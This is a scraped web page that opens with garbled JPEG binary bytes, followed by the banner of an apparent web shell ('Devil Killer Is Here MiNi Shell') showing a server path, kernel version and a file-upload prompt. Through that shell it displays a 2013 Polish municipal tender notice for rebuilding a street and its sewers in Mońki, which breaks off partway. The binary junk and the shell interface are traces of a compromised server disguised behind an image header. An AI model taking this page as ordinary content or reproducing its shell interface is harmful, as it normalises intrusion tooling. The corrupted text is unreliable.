JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130524/202632-N-2013.html

<p class="kh_header"><b>Mońki: Przebudowa ulicy Mickiewicza w Mońkach wraz z przebudową kanalizacji deszczowej i sanitarnej</b><br>
<b>Numer ogłoszenia: 202632 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Słowackiego 5a, 19-100 Mońki, woj. podlaskie, tel. (085) 716 21 96, faks (085) 716 29 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.monki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Mickiewicza w Mońkach wraz z przebudową kanalizacji deszczowej i sanitarnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Niniejsze postępowanie zostanie przeprowadzone  wspólnie i zamówienie zostanie udzielone wspólnie  na podstawie art. 16 ust 1 ustawy Prawo zamówień publicznych przez Powiat Moniecki 19-100 Mońki, ul. Słowackiego 5 a i Gminę Mońki, 19-100 Mońki, ul. Słowackiego 5 a.Upoważnionym do przeprowadzenia postępowania   jest Powiat Moniecki , w imieniu którego działa Zarząd Powiatu w Mońkach 19-100 Mońki, ul. Słowackiego 5 a

1/ Przedmiot zamówienia obejmuje  ( z uwzględnieniem postanowień art. 2 pkt. 8 oraz art. 30 ustawy Prawo zamówień publicznych) wykonanie zadania pod nazwą Przebudowa ul. Mickiewicza w Mońkach wraz z przebudową  kanalizacji deszczowej i sanitarnej.
Zadanie będzie polegało na :
a) przebudowie drogi powiatowej Nr 2361 B ul. Mickiewicza w Mońkach w km 0 +050 - 0+200 ;
b) przebudowie drogi powiatowej Nr 23 61 B  ul. Mickiewicza w Mońkach  w km 0+200 - 0+906;
c) budowie kanalizacji deszczowej w drodze powiatowej Nr 2363 B ul. PCK  w Mońkach:
rurociąg kanalizacji deszczowej PVC D 400 mm - 78 m,
rurociąg kanalizacji  deszczowej PVC D200 mm - 12 m,
studnie kanalizacyjne PP-B 600 mm - 2 sztuki,
wpusty ściekowe klasa D400 - 2 sztuki;
d) przebudowie i budowie kanalizacji deszczowej w ul. Mickiewicza w Mońkach:
metodą bezwykopową na odcinku od komory Nr 1 do komory Nr 10 po trasie istniejącego kanału o łącznej długości L=668,00 m,
wykopu otwartego na odcinku od trójnika  T1 do studni Nr D 1 na długości L=11,50 m ,
wykonanie nowych przyłączy deszczowych z rur PVC litych jednorodnych D 0,20 m SN 8 o łącznej długości 113,50 m,
wykonanie nowych studzienek ściekowych D 0,50 m betonowych z osadnikami , z typowymi  kratkami żeliwnymi - kpl 19,
renowacja komór na istniejącym kanale - szt 10
e) przebudowa kanalizacji sanitarnej  w ul. Mickiewicza w Mońkach:
metodą bezwykopową na odcinku od studni  Nr 1 do studni Nr 8  oraz od studni Nr 10 do studni Nr 19 o łącznej długości L= 597,50 m;
wykopu otwartego  na odcinku od studni nr 8 do studni nr 10 na długości L=64,00 m,
przełączenie 3 przyłączy sanitarnych do kanału sanitarnego ulicznego,
renowację studni na kanale
2/ W przypadku powierzenia części zamówienia podwykonawcom, zamawiający żąda wskazania  przez wykonawcę  w ofercie części zamówienia, której wykonanie powierzy podwykonawcom. Informację taką należy umieścić w załączniku nr  5 do SIWZ Wykaz osób i podmiotów, które będą wykonywać lub uczestniczyć w wykonywaniu zamówienia. 
3/ Na wykonane roboty  Wykonawca udzieli 36 miesięcznej gwarancji.
4/ Wykonawca zobowiązany będzie do opracowania projektu organizacji  ruchu na czas budowy, uzyskania  wymaganym  prawem uzgodnień i przedłożenia go Zamawiającemu przed rozpoczęciem robót. Wykonawca będzie zobowiązany do oznakowania robót zgodnie z zatwierdzonym projektem organizacji ruchu na czas budowy.
5/ W trakcie realizacji robót Wykonawca jest zobowiązany zapewnić dojazd do każdej posesji.
6/ Wykonawca zobowiązany jest prowadzić roboty kanalizacyjne  przy utrzymaniu ciągłości odbioru ścieków. Zaprojektowana  technologia wykonawstwa bierze pod uwagę  specyfikę prac  (renowację rurociągów) na czynnej kanalizacji grawitacyjnej i zapewnia możliwość  przepompowania ścieków z czynnych odcinków  kanalizacji, uwzględniając  sukcesywne pompowanie z istniejących przyłączy kanalizacyjnych i odgałęzień bocznych oraz otworzenie wszystkich czynnych przyłączy i odgałęzień  bocznych  po renowacji.
7/ Wykonawca zobowiązany jest przekazać  Zamawiającemu dokumenty pozwalające  na ocenę  prawidłowego wykonania przedmiotu umowy najpóźniej przy odbiorze końcowym w zakresie  określonym  postanowieniami Specyfikacji Technicznych Wykonania i Odbioru Robót , w szczególności :
- recepty i ustalenia technologiczne;
- dziennik budowy i książki obmiarów;
- wyniki pomiarów kontrolnych oraz badania  i oznaczenia  laboratoryjne, zgodne z SST;
- deklaracje zgodności  lub certyfikaty zgodności wbudowanych materiałów zgodnie z SST,
- geodezyjną inwentaryzację powykonawczą robót;
- kopię mapy zasadniczej powstałej  w wyniku geodezyjnej inwentaryzacji powykonawczej.
8/W przypadku gdy  w dokumentacji projektowej zostały wskazane nazwy, znaki towarowe lub typy materiałów czy produktów lub normy, aprobaty, specyfikacje czy systemy, o których mowa  w art. 29 ust. 3 i art. 30 ust. 1-3 ustawy Prawo zamówień publicznych, zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od określonych w dokumentacji.  W przypadku oferowania rozwiązań równoważnych w stosunku do rozwiązań określonych w dokumentacji projektowej, wykonawca zobowiązany jest do wypełnienia wymogu wynikającego z art. 30 ust.5 ustawy oraz podania wykazu dokumentów potwierdzających ich równoważność takich jak: certyfikaty, aprobaty techniczne z podaniem nazwy podmiotu wydającego oraz terminu ważności dokumentu. 
9/ Zaleca się Wykonawcom dokonanie szczegółowej wizji w terenie celem uzyskania wszystkich informacji koniecznych do sporządzenia oferty i zawarcia umowy. Każdy  z Wykonawców  ponosi skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.
10/ Szczegółowy zakres rzeczowy robót określają:
a) przedmiary robót - załącznik Nr 8 do SIWZ,
b) wzór umowy - załącznik  Nr  7 do SIWZ
c) szczegółowe specyfikacje techniczne wykonania i odbioru robót  - załącznik Nr 9 do SIWZ,
d) projekty wykonawcze    - załącznik  Nr 10 do SIWZ
11/ Zamawiający określa 12 miesięczny okres gwarancji na oznakowanie poziome cienkowarstwowe,
12/ Zamawiający ustala okres gwarancji  i pielęgnacji  na zieleń drogową do dnia  31 maja 2014 r.,
13/ Materiały z rozbiórki nadające się do ponownego użycia należy odwieźć na Plac Wydziału Dróg - Mońki ul. Mickiewicza 52. Miejsce składowania dla pozostałych materiałów wykonawca zapewni we własnym zakresie.
14/ Realizacja części 1 zamówienia jest ściśle powiązana z realizacją 2 części zamówienia. W przypadku braku możliwości realizacji części 2 zamówienia zamawiający unieważni postępowanie również na część 1 zamówienia  zgodnie z art. 93 ustawy Pzp..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień  uzupełniających, o których mowa  w art. 67 ust. 1 pkt. 6 ustawy Pzp stanowiących nie więcej niż 50 % zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2, 45.23.32.20-7, 45.23.24.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 30 000,00 zł  (słownie zł: trzydzieści tysięcy), w tym na część 1 zamówienia 10 000,00 zł i na część 2 zamówienia 20 000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań szczegółowych. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu według wzoru określonego w załączniku Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawcy udokumentują, iż w okresie ostatnich pięciu lat , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie i rzetelnie wykonali:
- co najmniej 2 roboty budowlane polegające na przebudowie drogi na kwotę co najmniej 1 000 000,00 zł brutto każda (dotyczy wykonawców składających ofertę na Część 1 zamówienia);
-  co najmniej  3 roboty budowlane polegające  na przebudowie kanalizacji deszczowej lub sanitarnej  metodą bezwykopową  za pomocą  rur GRP (dotyczy wykonawców składających ofertę na Część 2 zamówienia)
 z podaniem ich rodzaju i wartości , daty i miejsca wykonania oraz z załączeniem dowodów określających czy zostały wykonane  w sposób  należyty oraz wskazujących , czy zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań szczegółowych. Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu według wzoru określonego w załączniku Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) zamawiający wymaga , aby wykonawca dysponował:
- co najmniej jedną osobą posiadającą uprawnienia budowlane do pełnienia funkcji kierownika robót drogowych oraz co najmniej jedną osobą posiadająca uprawnienia budowlane  do pełnienia funkcji kierownika robót kanalizacyjnych (dotyczy wykonawców składających ofertę na Część 1 zamówienia),
- co najmniej jedną osobę posiadającą uprawnienia budowlane do pełnienia funkcji kierownika robót kanalizacyjnych (dotyczy wykonawców składających ofertę na część 2 zamówienia)
 ze wskazaniem zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami.
b) zamawiający wymaga aby wykonawca złożył oświadczenie, że osoby które będą wykonywały zamówienie posiadają wymagane uprawnienia , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający wymaga aby wykonawca posiadał  polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia   na kwotę ubezpieczenia co najmniej  1 000 000,00 zł  (słownie zł: jeden milion)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli wykonawca , wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust 2 b ustawy , zamawiający , w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów dotyczących w szczególności: zakresu dostępnych wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Uzupełniony formularz ofertowy, niezbędne pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty Wykonawcy jeżeli wystąpiły następujące okoliczności:
a) wystąpiła zmiana dokonana na podstawie art. 23 pkt 1 ustawy  Prawo budowlane tj. zmiana w rozwiązaniach projektowych , jeżeli są one uzasadnione  koniecznością zwiększenia bezpieczeństwa  realizacji robót budowlanych lub usprawnienia procesu budowy;
b) wystąpiła zmiana dokonana na podstawie  art. 20 ust. 1 pkt 4 lit.b ustawy Prawo budowlane tj. uzgodniono możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego;
c) zmiany dokonane zostały podczas wykonywania robót i  nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę  w ramach art. 36 a ust 5 ustawy Prawo budowlane  i dokonane zostały zgodnie z zapisami art. 36 a ust. 6 ustawy Prawo budowlane , spełniając zapisy  art. 57 ust. 2 ustawy Prawo budowlane;
d) w przypadku gdy nastąpi zmiana powszechnie obowiązujących  przepisów prawa  w zakresie  mającym wpływ na realizację przedmiotu zamówienia ,
e)  zmiana terminu zakończenia wykonania przedmiotu zamówienia, która  wynikła z okoliczności , których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona, w następujących przypadkach:
-  wystąpienia konieczności  wykonania robót dodatkowych, zamiennych lub uzupełniających, których realizacja  wiąże się z potrzebą  zmiany terminu wykonania przedmiotu umowy;
-  konieczności usunięcia błędów w dokumentacji projektowej;
- wystąpienia szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających  prowadzenie robót  budowlanych zgodnie ze sztuką  budowlaną i wiedzą  techniczną ;
- wystąpienie siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.monki.pl  zakładka przetargi odnośnik SIWZ<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mońkach 19-100 Mońki, Al. Niepodległości 3 pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Mońkach 19-100 Mońki, Ul. Słowackiego 5 a pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa drogi powiatowej Nr 2361 B ul. Mickiewicza w Mońkach na odcinku 0 + 000 - 0+ 906 oraz budowa kanalizacji deszczowej w drodze powiatowej nr 2363 B ul. PCK w Mońkach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie będzie polegało na:
1) przebudowie drogi powiatowej Nr 2361 B ul. Mickiewicza w Mońkach w km 0 +050 - 0+200 ;
2) przebudowie drogi powiatowej Nr 23 61 B  ul. Mickiewicza w Mońkach  w km 0+200 - 0+906;
3) budowie kanalizacji deszczowej w drodze powiatowej Nr 2363 B ul. PCK  w Mońkach:
rurociąg kanalizacji deszczowej PVC D 400 mm - 78 m,
rurociąg kanalizacji  deszczowej PVC D200 mm - 12 m,
studnie kanalizacyjne PP-B 600 mm - 2 sztuki,
wpusty ściekowe klasa D400 - 2 sztuki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2, 45.23.32.20-7, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa kanalizacji deszczowej i sanitarnej w ul. Mickiewicza w Mońkach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie będzie polegało na:
1) przebudowie i budowie kanalizacji deszczowej w ul. Mickiewicza w Mońkach:
metodą bezwykopową na odcinku od komory Nr 1 do komory Nr 10 po trasie istniejącego kanału o łącznej długości L=668,00 m,
wykopu otwartego na odcinku od trójnika  T1 do studni Nr D 1 na długości L=11,50 m ,
wykonanie nowych przyłączy deszczowych z rur PVC litych jednorodnych D 0,20 m SN 8 o łącznej długości 113,50 m,
wykonanie nowych studzienek ściekowych D 0,50 m betonowych z osadnikami , z typowymi  kratkami żeliwnymi - kpl 19,
renowacja komór na istniejącym kanale - szt 10
2) przebudowa kanalizacji sanitarnej  w ul. Mickiewicza w Mońkach:
